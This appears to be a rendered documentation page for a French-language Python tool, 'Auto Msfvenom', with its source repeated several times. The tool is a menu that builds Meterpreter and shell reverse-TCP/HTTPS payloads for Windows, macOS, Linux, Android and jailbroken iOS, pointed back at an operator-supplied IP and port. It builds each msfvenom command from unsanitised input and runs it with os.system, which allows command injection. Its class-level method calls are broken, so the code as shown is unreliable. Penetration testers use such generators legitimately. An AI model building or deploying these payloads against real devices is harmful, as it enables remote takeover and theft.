clarity.tools.automsf
1import os 2from clarity.core import ClarityTool, Colors, soft_input 3import sys 4 5 6class Msfvenom(ClarityTool): 7 """Un outil pour générer des payloads avec msfvenom. [Added via plugin, no auto install yet]""" 8 9 TITLE = "Auto Msfvenom" 10 DESCRIPTION = "Générateur de payloads pour Metasploit Framework.[Added via plugin, no auto install yet]" 11 12 def __init__(self): 13 super().__init__(options=[ 14 ("Générer un payload", self.gen_msfvenom) 15 ], installable=False, runnable=True) 16 17 def gen_payloads(self, payload, lhost, lport, fmt, outfile): 18 print(f"{Colors.GREEN}[+] Génération du payload...{Colors.RESET}") 19 command = f"msfvenom -p {payload} LHOST={lhost} LPORT={lport} -f {fmt} -o {outfile}" 20 print(f"{Colors.CYAN}Commande : {command}{Colors.RESET}") 21 os.system(command) 22 23 24 def gen_msfvenom(self): 25 # les soft_inputs 26 print(f"{Colors.RED}[!]IMPORTANT: Je ne suis pas responsable de ce que tu fais avec ce script, ceci est a but éducatif{Colors.RESET}") 27 LHOST = soft_input(f"{Colors.YELLOW}Ton ip?: ") 28 LPORT = soft_input(f"Le port?: ") 29 print(Colors.RESET) 30 31 print(f"{Colors.CYAN}-------MSFVENOM DKP MENU----------") 32 print("") 33 print(f"{Colors.RED}[!]IMPORATANT: Nécéssite METASPLOIT{Colors.CYAN}") 34 print("") 35 print("[1]: Windows") 36 print("[2]: Mac") 37 print("[3]: Linux") 38 print("[4]: Android") 39 print("[5]: Ios") 40 print("[0]: Exit") 41 print(f"{Colors.RESET}") 42 choice = soft_input(f"{Colors.ORANGE}Quelles est la catégorie demandé?(entré le bon numéro): {Colors.RESET}") 43 44 if choice == "1": 45 print("") 46 print(f"{Colors.CYAN}---------WINDOWS-------") 47 print("[1]: Windows Meterpreter Reverse Tcp") 48 print("[2]: Windows Shell Reverse Tcp") 49 print("[3]: Windows Meterpreter Reverse Https") 50 print(f"[0]: Exit {Colors.RESET}") 51 win_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Windows?: {Colors.RESET}") 52 if win_choice == "1": 53 Msfvenom.gen_payloads("windows/meterpreter/reverse_tcp", LHOST, LPORT, "exe", "payload_win_meter_tcp.exe") 54 elif win_choice == "2": 55 Msfvenom.gen_payloads("windows/shell/reverse_tcp", LHOST, LPORT, "exe", "payload_win_shell_tcp.exe") 56 elif win_choice == "3": 57 Msfvenom.gen_payloads("windows/meterpreter/reverse_https", LHOST, LPORT, "exe", "payload_win_meter_https.exe") 58 elif win_choice == "0": 59 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 60 sys.exit(0) 61 else: 62 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 63 sys.exit(0) 64 65 elif choice == "2": 66 print("") 67 print(f"{Colors.CYAN}---------MAC-------") 68 print("[1]: Mac Meterpreter Reverse Tcp") 69 print("[2]: Mac Meterpreter Reverse Shell") 70 print("[3]: Mac Meterpreter Reverse Https") 71 print(f"[0]: Exit {Colors.RESET}") 72 mac_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Mac?: {Colors.RESET}") 73 if mac_choice == "1": 74 Msfvenom.gen_payloads("osx/x64/meterpreter_reverse_tcp", LHOST, LPORT, "macho", "payload_mac_meter_tcp.macho") 75 elif mac_choice == "2": 76 Msfvenom.gen_payloads("osx/x64/shell_reverse_tcp", LHOST, LPORT, "macho", "payload_mac_shell_tcp.macho") 77 elif mac_choice == "3": 78 Msfvenom.gen_payloads("osx/x64/meterpreter_reverse_https", LHOST, LPORT, "macho", "payload_mac_meter_https.macho") 79 elif mac_choice == "0": 80 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 81 sys.exit(0) 82 else: 83 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 84 sys.exit(0) 85 86 elif choice == "3": 87 print("") 88 print(f"{Colors.CYAN}---------LINUX-------") 89 print("[1]: Linux Meterpreter Reverse Tcp") 90 print("[2]: Linux Meterpreter Reverse Shell") 91 print("[3]: Linux Meterpreter Reverse Https") 92 print(f"[0]: Exit {Colors.RESET}") 93 lin_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Linux?: {Colors.RESET}") 94 if lin_choice == "1": 95 Msfvenom.gen_payloads("linux/x64/meterpreter_reverse_tcp", LHOST, LPORT, "elf", "payload_lin_meter_tcp.elf") 96 elif lin_choice == "2": 97 Msfvenom.gen_payloads("linux/x64/shell_reverse_tcp", LHOST, LPORT, "elf", "payload_lin_shell_tcp.elf") 98 elif lin_choice == "3": 99 Msfvenom.gen_payloads("linux/x64/meterpreter_reverse_https", LHOST, LPORT, "elf", "payload_lin_meter_https.elf") 100 elif lin_choice == "0": 101 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 102 sys.exit(0) 103 else: 104 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 105 sys.exit(0) 106 107 108 elif choice == "4": 109 print("") 110 print(f"{Colors.CYAN}---------Android-------") 111 print("[1]: Android Meterpreter Reverse Tcp") 112 print("[2]: Android Meterpreter Reverse Shell") 113 print("[3]: Android Meterpreter Reverse Https") 114 print(f"[0]: Exit {Colors.RESET}") 115 and_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Android?: {Colors.RESET}") 116 if and_choice == "1": 117 Msfvenom.gen_payloads("android/meterpreter/reverse_tcp", LHOST, LPORT, "apk", "payload_and_meter_tcp.apk") 118 elif and_choice == "2": 119 Msfvenom.gen_payloads("android/shell/reverse_tcp", LHOST, LPORT, "apk", "payload_and_shell_tcp.apk") 120 elif and_choice == "3": 121 Msfvenom.gen_payloads("android/meterpreter/reverse_https", LHOST, LPORT, "apk", "payload_and_meter_https.apk") 122 elif and_choice == "0": 123 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 124 sys.exit(0) 125 else: 126 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 127 sys.exit(0) 128 129 elif choice == "5": 130 print("") 131 print(f"{Colors.CYAN}---------IOS-------") 132 print(f"{Colors.RED}Nécéssite que l'appareil soit JAILBREAKE{Colors.CYAN}") 133 print("[1]: IOS Meterpreter Reverse Tcp") 134 print("[2]: IOS Meterpreter Reverse Shell") 135 print("[3]: IOS Meterpreter Reverse Https") 136 print(f"[0]: Exit {Colors.RESET}") 137 ios_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload IOS?: {Colors.RESET}") 138 if ios_choice == "1": 139 Msfvenom.gen_payloads("apple_ios/aarch64/meterpreter_reverse_tcp", LHOST, LPORT, "ipa", "payload_ios_meter_tcp.ipa") 140 elif ios_choice == "2": 141 Msfvenom.gen_payloads("apple_ios/aarch64/shell_reverse_tcp", LHOST, LPORT, "ipa", "payload_ios_shell_tcp.ipa") 142 elif ios_choice == "3": 143 Msfvenom.gen_payloads("apple_ios/aarch64/meterpreter_reverse_https", LHOST, LPORT, "ipa", "payload_ios_meter_https.ipa") 144 elif ios_choice == "0": 145 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 146 sys.exit(0) 147 else: 148 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 149 sys.exit(0) 150 151 152 else: 153 print(f"{Colors.RED}Entrée non reconnu: Fin du script{Colors.RESET}") 154 sys.exit(0)
7class Msfvenom(ClarityTool): 8 """Un outil pour générer des payloads avec msfvenom. [Added via plugin, no auto install yet]""" 9 10 TITLE = "Auto Msfvenom" 11 DESCRIPTION = "Générateur de payloads pour Metasploit Framework.[Added via plugin, no auto install yet]" 12 13 def __init__(self): 14 super().__init__(options=[ 15 ("Générer un payload", self.gen_msfvenom) 16 ], installable=False, runnable=True) 17 18 def gen_payloads(self, payload, lhost, lport, fmt, outfile): 19 print(f"{Colors.GREEN}[+] Génération du payload...{Colors.RESET}") 20 command = f"msfvenom -p {payload} LHOST={lhost} LPORT={lport} -f {fmt} -o {outfile}" 21 print(f"{Colors.CYAN}Commande : {command}{Colors.RESET}") 22 os.system(command) 23 24 25 def gen_msfvenom(self): 26 # les soft_inputs 27 print(f"{Colors.RED}[!]IMPORTANT: Je ne suis pas responsable de ce que tu fais avec ce script, ceci est a but éducatif{Colors.RESET}") 28 LHOST = soft_input(f"{Colors.YELLOW}Ton ip?: ") 29 LPORT = soft_input(f"Le port?: ") 30 print(Colors.RESET) 31 32 print(f"{Colors.CYAN}-------MSFVENOM DKP MENU----------") 33 print("") 34 print(f"{Colors.RED}[!]IMPORATANT: Nécéssite METASPLOIT{Colors.CYAN}") 35 print("") 36 print("[1]: Windows") 37 print("[2]: Mac") 38 print("[3]: Linux") 39 print("[4]: Android") 40 print("[5]: Ios") 41 print("[0]: Exit") 42 print(f"{Colors.RESET}") 43 choice = soft_input(f"{Colors.ORANGE}Quelles est la catégorie demandé?(entré le bon numéro): {Colors.RESET}") 44 45 if choice == "1": 46 print("") 47 print(f"{Colors.CYAN}---------WINDOWS-------") 48 print("[1]: Windows Meterpreter Reverse Tcp") 49 print("[2]: Windows Shell Reverse Tcp") 50 print("[3]: Windows Meterpreter Reverse Https") 51 print(f"[0]: Exit {Colors.RESET}") 52 win_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Windows?: {Colors.RESET}") 53 if win_choice == "1": 54 Msfvenom.gen_payloads("windows/meterpreter/reverse_tcp", LHOST, LPORT, "exe", "payload_win_meter_tcp.exe") 55 elif win_choice == "2": 56 Msfvenom.gen_payloads("windows/shell/reverse_tcp", LHOST, LPORT, "exe", "payload_win_shell_tcp.exe") 57 elif win_choice == "3": 58 Msfvenom.gen_payloads("windows/meterpreter/reverse_https", LHOST, LPORT, "exe", "payload_win_meter_https.exe") 59 elif win_choice == "0": 60 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 61 sys.exit(0) 62 else: 63 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 64 sys.exit(0) 65 66 elif choice == "2": 67 print("") 68 print(f"{Colors.CYAN}---------MAC-------") 69 print("[1]: Mac Meterpreter Reverse Tcp") 70 print("[2]: Mac Meterpreter Reverse Shell") 71 print("[3]: Mac Meterpreter Reverse Https") 72 print(f"[0]: Exit {Colors.RESET}") 73 mac_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Mac?: {Colors.RESET}") 74 if mac_choice == "1": 75 Msfvenom.gen_payloads("osx/x64/meterpreter_reverse_tcp", LHOST, LPORT, "macho", "payload_mac_meter_tcp.macho") 76 elif mac_choice == "2": 77 Msfvenom.gen_payloads("osx/x64/shell_reverse_tcp", LHOST, LPORT, "macho", "payload_mac_shell_tcp.macho") 78 elif mac_choice == "3": 79 Msfvenom.gen_payloads("osx/x64/meterpreter_reverse_https", LHOST, LPORT, "macho", "payload_mac_meter_https.macho") 80 elif mac_choice == "0": 81 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 82 sys.exit(0) 83 else: 84 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 85 sys.exit(0) 86 87 elif choice == "3": 88 print("") 89 print(f"{Colors.CYAN}---------LINUX-------") 90 print("[1]: Linux Meterpreter Reverse Tcp") 91 print("[2]: Linux Meterpreter Reverse Shell") 92 print("[3]: Linux Meterpreter Reverse Https") 93 print(f"[0]: Exit {Colors.RESET}") 94 lin_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Linux?: {Colors.RESET}") 95 if lin_choice == "1": 96 Msfvenom.gen_payloads("linux/x64/meterpreter_reverse_tcp", LHOST, LPORT, "elf", "payload_lin_meter_tcp.elf") 97 elif lin_choice == "2": 98 Msfvenom.gen_payloads("linux/x64/shell_reverse_tcp", LHOST, LPORT, "elf", "payload_lin_shell_tcp.elf") 99 elif lin_choice == "3": 100 Msfvenom.gen_payloads("linux/x64/meterpreter_reverse_https", LHOST, LPORT, "elf", "payload_lin_meter_https.elf") 101 elif lin_choice == "0": 102 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 103 sys.exit(0) 104 else: 105 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 106 sys.exit(0) 107 108 109 elif choice == "4": 110 print("") 111 print(f"{Colors.CYAN}---------Android-------") 112 print("[1]: Android Meterpreter Reverse Tcp") 113 print("[2]: Android Meterpreter Reverse Shell") 114 print("[3]: Android Meterpreter Reverse Https") 115 print(f"[0]: Exit {Colors.RESET}") 116 and_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Android?: {Colors.RESET}") 117 if and_choice == "1": 118 Msfvenom.gen_payloads("android/meterpreter/reverse_tcp", LHOST, LPORT, "apk", "payload_and_meter_tcp.apk") 119 elif and_choice == "2": 120 Msfvenom.gen_payloads("android/shell/reverse_tcp", LHOST, LPORT, "apk", "payload_and_shell_tcp.apk") 121 elif and_choice == "3": 122 Msfvenom.gen_payloads("android/meterpreter/reverse_https", LHOST, LPORT, "apk", "payload_and_meter_https.apk") 123 elif and_choice == "0": 124 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 125 sys.exit(0) 126 else: 127 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 128 sys.exit(0) 129 130 elif choice == "5": 131 print("") 132 print(f"{Colors.CYAN}---------IOS-------") 133 print(f"{Colors.RED}Nécéssite que l'appareil soit JAILBREAKE{Colors.CYAN}") 134 print("[1]: IOS Meterpreter Reverse Tcp") 135 print("[2]: IOS Meterpreter Reverse Shell") 136 print("[3]: IOS Meterpreter Reverse Https") 137 print(f"[0]: Exit {Colors.RESET}") 138 ios_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload IOS?: {Colors.RESET}") 139 if ios_choice == "1": 140 Msfvenom.gen_payloads("apple_ios/aarch64/meterpreter_reverse_tcp", LHOST, LPORT, "ipa", "payload_ios_meter_tcp.ipa") 141 elif ios_choice == "2": 142 Msfvenom.gen_payloads("apple_ios/aarch64/shell_reverse_tcp", LHOST, LPORT, "ipa", "payload_ios_shell_tcp.ipa") 143 elif ios_choice == "3": 144 Msfvenom.gen_payloads("apple_ios/aarch64/meterpreter_reverse_https", LHOST, LPORT, "ipa", "payload_ios_meter_https.ipa") 145 elif ios_choice == "0": 146 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 147 sys.exit(0) 148 else: 149 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 150 sys.exit(0) 151 152 153 else: 154 print(f"{Colors.RED}Entrée non reconnu: Fin du script{Colors.RESET}") 155 sys.exit(0)
Un outil pour générer des payloads avec msfvenom. [Added via plugin, no auto install yet]
DESCRIPTION =
'Générateur de payloads pour Metasploit Framework.[Added via plugin, no auto install yet]'
def
gen_payloads(self, payload, lhost, lport, fmt, outfile):
18 def gen_payloads(self, payload, lhost, lport, fmt, outfile): 19 print(f"{Colors.GREEN}[+] Génération du payload...{Colors.RESET}") 20 command = f"msfvenom -p {payload} LHOST={lhost} LPORT={lport} -f {fmt} -o {outfile}" 21 print(f"{Colors.CYAN}Commande : {command}{Colors.RESET}") 22 os.system(command)
def
gen_msfvenom(self):
25 def gen_msfvenom(self): 26 # les soft_inputs 27 print(f"{Colors.RED}[!]IMPORTANT: Je ne suis pas responsable de ce que tu fais avec ce script, ceci est a but éducatif{Colors.RESET}") 28 LHOST = soft_input(f"{Colors.YELLOW}Ton ip?: ") 29 LPORT = soft_input(f"Le port?: ") 30 print(Colors.RESET) 31 32 print(f"{Colors.CYAN}-------MSFVENOM DKP MENU----------") 33 print("") 34 print(f"{Colors.RED}[!]IMPORATANT: Nécéssite METASPLOIT{Colors.CYAN}") 35 print("") 36 print("[1]: Windows") 37 print("[2]: Mac") 38 print("[3]: Linux") 39 print("[4]: Android") 40 print("[5]: Ios") 41 print("[0]: Exit") 42 print(f"{Colors.RESET}") 43 choice = soft_input(f"{Colors.ORANGE}Quelles est la catégorie demandé?(entré le bon numéro): {Colors.RESET}") 44 45 if choice == "1": 46 print("") 47 print(f"{Colors.CYAN}---------WINDOWS-------") 48 print("[1]: Windows Meterpreter Reverse Tcp") 49 print("[2]: Windows Shell Reverse Tcp") 50 print("[3]: Windows Meterpreter Reverse Https") 51 print(f"[0]: Exit {Colors.RESET}") 52 win_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Windows?: {Colors.RESET}") 53 if win_choice == "1": 54 Msfvenom.gen_payloads("windows/meterpreter/reverse_tcp", LHOST, LPORT, "exe", "payload_win_meter_tcp.exe") 55 elif win_choice == "2": 56 Msfvenom.gen_payloads("windows/shell/reverse_tcp", LHOST, LPORT, "exe", "payload_win_shell_tcp.exe") 57 elif win_choice == "3": 58 Msfvenom.gen_payloads("windows/meterpreter/reverse_https", LHOST, LPORT, "exe", "payload_win_meter_https.exe") 59 elif win_choice == "0": 60 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 61 sys.exit(0) 62 else: 63 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 64 sys.exit(0) 65 66 elif choice == "2": 67 print("") 68 print(f"{Colors.CYAN}---------MAC-------") 69 print("[1]: Mac Meterpreter Reverse Tcp") 70 print("[2]: Mac Meterpreter Reverse Shell") 71 print("[3]: Mac Meterpreter Reverse Https") 72 print(f"[0]: Exit {Colors.RESET}") 73 mac_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Mac?: {Colors.RESET}") 74 if mac_choice == "1": 75 Msfvenom.gen_payloads("osx/x64/meterpreter_reverse_tcp", LHOST, LPORT, "macho", "payload_mac_meter_tcp.macho") 76 elif mac_choice == "2": 77 Msfvenom.gen_payloads("osx/x64/shell_reverse_tcp", LHOST, LPORT, "macho", "payload_mac_shell_tcp.macho") 78 elif mac_choice == "3": 79 Msfvenom.gen_payloads("osx/x64/meterpreter_reverse_https", LHOST, LPORT, "macho", "payload_mac_meter_https.macho") 80 elif mac_choice == "0": 81 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 82 sys.exit(0) 83 else: 84 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 85 sys.exit(0) 86 87 elif choice == "3": 88 print("") 89 print(f"{Colors.CYAN}---------LINUX-------") 90 print("[1]: Linux Meterpreter Reverse Tcp") 91 print("[2]: Linux Meterpreter Reverse Shell") 92 print("[3]: Linux Meterpreter Reverse Https") 93 print(f"[0]: Exit {Colors.RESET}") 94 lin_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Linux?: {Colors.RESET}") 95 if lin_choice == "1": 96 Msfvenom.gen_payloads("linux/x64/meterpreter_reverse_tcp", LHOST, LPORT, "elf", "payload_lin_meter_tcp.elf") 97 elif lin_choice == "2": 98 Msfvenom.gen_payloads("linux/x64/shell_reverse_tcp", LHOST, LPORT, "elf", "payload_lin_shell_tcp.elf") 99 elif lin_choice == "3": 100 Msfvenom.gen_payloads("linux/x64/meterpreter_reverse_https", LHOST, LPORT, "elf", "payload_lin_meter_https.elf") 101 elif lin_choice == "0": 102 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 103 sys.exit(0) 104 else: 105 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 106 sys.exit(0) 107 108 109 elif choice == "4": 110 print("") 111 print(f"{Colors.CYAN}---------Android-------") 112 print("[1]: Android Meterpreter Reverse Tcp") 113 print("[2]: Android Meterpreter Reverse Shell") 114 print("[3]: Android Meterpreter Reverse Https") 115 print(f"[0]: Exit {Colors.RESET}") 116 and_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload Android?: {Colors.RESET}") 117 if and_choice == "1": 118 Msfvenom.gen_payloads("android/meterpreter/reverse_tcp", LHOST, LPORT, "apk", "payload_and_meter_tcp.apk") 119 elif and_choice == "2": 120 Msfvenom.gen_payloads("android/shell/reverse_tcp", LHOST, LPORT, "apk", "payload_and_shell_tcp.apk") 121 elif and_choice == "3": 122 Msfvenom.gen_payloads("android/meterpreter/reverse_https", LHOST, LPORT, "apk", "payload_and_meter_https.apk") 123 elif and_choice == "0": 124 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 125 sys.exit(0) 126 else: 127 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 128 sys.exit(0) 129 130 elif choice == "5": 131 print("") 132 print(f"{Colors.CYAN}---------IOS-------") 133 print(f"{Colors.RED}Nécéssite que l'appareil soit JAILBREAKE{Colors.CYAN}") 134 print("[1]: IOS Meterpreter Reverse Tcp") 135 print("[2]: IOS Meterpreter Reverse Shell") 136 print("[3]: IOS Meterpreter Reverse Https") 137 print(f"[0]: Exit {Colors.RESET}") 138 ios_choice = soft_input(f"{Colors.ORANGE}Que veut tu en payload IOS?: {Colors.RESET}") 139 if ios_choice == "1": 140 Msfvenom.gen_payloads("apple_ios/aarch64/meterpreter_reverse_tcp", LHOST, LPORT, "ipa", "payload_ios_meter_tcp.ipa") 141 elif ios_choice == "2": 142 Msfvenom.gen_payloads("apple_ios/aarch64/shell_reverse_tcp", LHOST, LPORT, "ipa", "payload_ios_shell_tcp.ipa") 143 elif ios_choice == "3": 144 Msfvenom.gen_payloads("apple_ios/aarch64/meterpreter_reverse_https", LHOST, LPORT, "ipa", "payload_ios_meter_https.ipa") 145 elif ios_choice == "0": 146 print(f"{Colors.YELLOW}Fin{Colors.RESET}") 147 sys.exit(0) 148 else: 149 print(f"{Colors.RED}Inconnu: Fin{Colors.RESET}") 150 sys.exit(0) 151 152 153 else: 154 print(f"{Colors.RED}Entrée non reconnu: Fin du script{Colors.RESET}") 155 sys.exit(0)